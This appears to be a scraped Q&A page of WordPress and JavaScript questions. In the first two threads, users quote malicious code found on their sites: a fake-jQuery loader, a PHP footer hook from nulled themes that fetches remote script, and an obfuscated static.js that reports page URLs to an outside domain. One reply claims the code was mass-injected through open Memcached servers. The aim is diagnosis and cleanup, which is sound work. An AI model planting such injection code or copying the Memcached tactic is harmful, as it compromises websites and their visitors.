Remove script from wordpress site - javascript

I am using Malware bytes and every time I visit my wordpress site it blocks a script trying to run on the page, the script is:
<script type="text/javascript">
if (!document.referrer || document.referrer == '') {
document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.min.js"></scr' + 'ipt>');
} else {
document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.js"></scr' + 'ipt>');
}
</script>
I'm not sure if it malicious or not but I would like to remove it, however I do not know which plugin or file is causing it, i've tried looking at page source, etc.
What does the script mean and is there a way to find out what's causing it?
Any help would be greatly appreciated.

You are using a wordpress plugin or theme that you probably downloaded from a repository of 'nulled' themes and plugins.
Almost all such websites use a business model whereby they offer premium themes and plugins which normally cost 5$-75$ for free.
But as the saying goes, there is no such thing as a free lunch. In exchange for the free plugin/theme, the website proprietor adds code which includes a js file from an outside domain which adds banners to your website.
To prevent the webmaster or developer from immediately noticing the banners (or just a back link or three), either anyone logged in as admin or/and anyone without a referrer url is not shown the advertisements.
In your case, the payload was being included from a domain which is similar to the real thing thereby fooling enough inexperienced Wordpress webmasters as something which belongs - jQuery. Official jQuery CDN is located here //code.jquery.com/
Make sure to check all themes or plugins from shady places for similar code which may also be inside image files though normally is inside init.php or functions.php. Here is another example of similar code using a different variation of jquery domain.
if(!function_exists('wp_func_jquery')) {
function wp_func_jquery() {
$host = 'http://';
$jquery = $host.'u'.'jquery.org/jquery-1.6.3.min.js';
if (#fopen($jquery,'r')){
echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
}
}
add_action('wp_footer', 'wp_func_jquery');
}

You can search for this script in your wordpress directory using one of the applications proposed in this question: Tools to search for strings inside files without indexing.

Related

Malicious JS code in Wordpress change the domain where it is hosted

In my Wordpress site, i have this malicious code before "/body":
<script src="https://fastjscdn.org/static.js?hash=a633f506a53746a846742c5655ebf596"></script>
The file static.js contains this:
window.__google__ads__show||(window.__google__ads__show="1",function(){if(function t(){try{return window.self!==window.top}catch(a){return!0}}()){var t,a,e=window.parent.document.createElement("script");e.src="https://fastjscdn.org/static.js",window.parent.document.body.appendChild(e);return}fetch("https://fastjscdn.org/platform/"+(window.navigator?.userAgentData?.platform||window.navigator.platform)+"/url/"+window.location.href).then(t=>{}),t="https://fastjscdn.org/"+window.location.hostname.replace("www.","")+"/static.js",(a=document.createElement("script")).src=t,document.head.appendChild(a)}());
Before "fastjscdn .org", the maliciuos JS code was hosting on domanin name "asmr9999 .live". Since few days, the domain has changed in "fastjscdn .org".
How is it possible? How can it change the domain where is it hosted?
I am sure that Wordpress, themes and plugins do not contain the malicious code. I didn't find anything in the database, also in base64 encode, for now.
Also, What does the code in the JS file do to my site?
I also found other people with my same malware, in a custom CMS, we can not solve the problem in any way. More info here
It maybe late,but let me tell the truth.The problem is the Memcached server you are using which is public and no password in network.I made a script scanning the network and injecting this malicious code to every memcached server.It's a "cache-side" xss attack.Your server is safe.Configure your firewall and block connection from outside to port 11211,everything will ok.
You can use an online JavaScript beautifier tool to check the content of static.js: seems to be injecting script adapted to the platform, probably the same that you mentioned in your other question that will trigger the download of a malware/adware
The reason why it could change the domain in the script is probably because your host is still infected; the domain was registered very recently, and was probably chosen as it looks less suspicious than the previous one

Make ShareThis (a script) load on certain pages only

We have a WordPress site where we use a programme to create share buttons for our site. This is called ShareThis. All we have to do to integrate it to our site is to add the following script to our header.php.
<script type='text/javascript' src='//platform-api.sharethis.com/js/sharethis.js#property=58ff3bc2a9dabe0012b03357&product=inline-share-buttons' async='async'></script>
We did - and it is working perfectly. But is there a way to make this script load on our blog only, and not on every page of our site? It is slowing down our site by approximately 400 ms and is only used in our blog posts.
There actually is an easy way to do this.
In your header, you can do this. First I will explain what, and then how you do.
You can do this easily by checking if the $_SERVER['REQUEST_URI'] variable starts with 'blog' or the desired page prefix to load on, for example http://yoursite.com/blog/(post)
How-to:
if (0 === strpos($_SERVER['REQUEST_URI'], '/blog')) {
// Load script
echo "<script type='text/javascript' src='//platform-api.sharethis.com/js/sharethis.js#property=5‌​8ff3bc2a9dabe0012b03‌​357&product=inline-s‌​hare-buttons' async='async'></script>";
}

DotNetNuke include javascript on every page

I want to create a module that basically includes javascript on to every page on a dotnetnuke site. I can include a js file in the current page,
ClientResourceManager.RegisterScript(this.Page,
"~/DesktopModules/AuthenticationServices/ZapperScanToLogin/view.js",
FileOrder.Js.jQuery);
but what I really want to do is install my module on the home page and it will include javascript on to every page on the dnn site. Is this possible, how can I do it?
I would honestly do this with a modification to your skin, but here are the steps to do it with a module.
Create a module (I recommend starting with my templates http://christoctemplate.codeplex.com)
Add your JS code
Add the module to the homepage
Go to the module settings, choose Display on All Pages
I would add this to your skin, either just manually by adding the reference, or by creating a SkinObject rather than a module.
If you do it as a module it is possible that a user can delete the module from the page, or a number of other things. if this script is a requirement it is best to make it so that users can't break the site by doing something accidentally.
One way to do it is add to the header of the site, under site settings. Logged in as SuperUser:
Go Settings (Cog) Site Settings
Site behavior Tab - Default Pages
At the bottom: Page Output Settings
HTML Page Header Tags: add your script link:
Sample below. Does not show up at bottom of page, shows up top in header, but will be on every page.
<script type="text/javascript" src="/Portals/0/Your-js-here.js"></script>
There ought to be a page template for your module which you can edit and insert the jQuery script reference into the header of (in between the <head> tags). This would then be loaded on each page of the module.
Here are a couple of references that might help:
http://wnsinj.codeplex.com/
http://www.dnnsoftware.com/community-blog/cid/135141/DotNetNuke-Tips-and-Tricks-11-Using-jQuery-in-DotNetNuke
What I ended up doing was including a javascript registration in the js/debug/dnn.modalpopup.js file, which then registers my javascript on the login and registration pages and popup dialogue boxes.
var myView = document.createElement("script");
myView.type = "text/javascript";
myView.src = "/js/view.js";
var myTech = document.createElement("script");
myTech.type = "text/javascript";
myTech.src = "/js/mytech.js";
document.head.appendChild(myView);
document.head.appendChild(myTech);
I am not sure placing the javascript files in that location is ideal or not, but this is the solution that works for me. I think the manual dev work per DNN site will be minimal so I hope it's an acceptable solution.
I am not sure whether I should put the script in the page head, or the body... the order of loading and what not of javascript is a mystery to me.

Javascript redirection / domain specify

I found an nice script while searching and inspecting the elements of some websites.
This is what I have found:
<script type="text/javascript">
//redirect browser to fullscreen preview
if (/^http:\/\/codecanyon\.net/.test(document.referrer))
window.top.location.href = 'http://www.gravitysign.com/backslider/';
</script>
So if I understood from this script it tells jquery if the website is opened over codecanyon redirect them to specifed website for preview.
Now... I was wondering if there is possibility to make something like this.
If we specify an website for example http://google.com and we input that into javascript... And then if that website is uploaded to any other domain, other then google.com ... It will redirect to specified site (google) ?
So to clear things out a little bit let me make an example.
If I made a website for "an-website.com" and then someone take their website and upload it to "another-website.com", it will automatically redirect all visitors from another-website.com to an-website.com.
Hope I was clear enough and hope that this is possible. Cheers!
You can of course redirect any user accessing your site from a domain not matching yours but using javascript. This should work just fine:
if (window.location.hostname !== 'yourdomain.com'){
window.top.location.href = 'http://yourdomain.com';
}
You can also use match, if you host your site on a subdomain, etc.
Keep in mind that any person with write access to the file on the server will be able to remove this "copy protection". Copy protecting client side content is impossible, as you need to serve the content in a way a browser understands, effectively making the content available to anyone.
If you are looking for solution for single domain protection, here you can see my
Redirect Website if its not specified domain in script - Protection using Javascript
I am looking for solution for multiple domain.

How to get url of embedding page for a javascript widget

(Rewording the question as there were very few views otherwise).
I want to build a widget that others can include on their website, and the widget itself will be hosted on my website. I am aware of just one method to build widgets that can be embedded on other websites: The website that wants to embedd the widget sources a javascript from my site, which does "document.write" on the page. Something like:
<script language="javascript" src="http://www.my-website-that-will-host-the-widget.com/javascript-emitter.php?id=1234&width=200&bordercolor=000000&bg=ffffff&textcolor=000000"></script>
Now, I want to make a particular widget accessible from only particular domains. For this, I want to know the URL of the page that is embedding my widget reliably . No-one should be able to spoof it. For example, if I have an explicit variable in the embedding code, people can change it.
How do I do it? (I also want that there minimal code to write for the person who is embedding my widget).
regards,
JP
Explanation 1:
Lets say I want to do this: If widget is accessed from 1.com, display A, else display B. How do I do it reliably. Thing is, "A" is something that should not be visible in the code unless the widget is accessed from 1.com. (Thus, if it is embedded in 2.com, I don't want to output if(location.href == 1.com) write(A) else write (B)
Note 1:
(As an aside, if someone feels my method is not good/efficient and can suggest better methods/tutorials, etc., that would be great help. Most google queries give you sites that explain how to build/obtain widget for "your site".... and usually point to websites that allow you to build widgets hosted with them, I want to understand how to build widgets that can be embedded by other websites from my site)
In javascript on the client-side, you can use location.href to get the url of the current page:
var url = location.href;
If you do not want to output any javascript at all for a forbidden domain, in your php you can check the HTTP_REFERER header with the global variable $HTTP_REFERER. In your javascript-emitter.php script try this:
<?php
echo $HTTP_REFERER;
?>
However be warned that this is not always to be trusted: it is up to the client (the browser) to send the correct REFERER header. And of course if someone really wanted to include your widget on their site, they could easily request your javascript server-side spoofing the REFERER header - that is set it to something that's on your whitelist - before forwarding it to the client.
In short there's no way you can easily and absolutely block blacklisted sites from using your widget.

Categories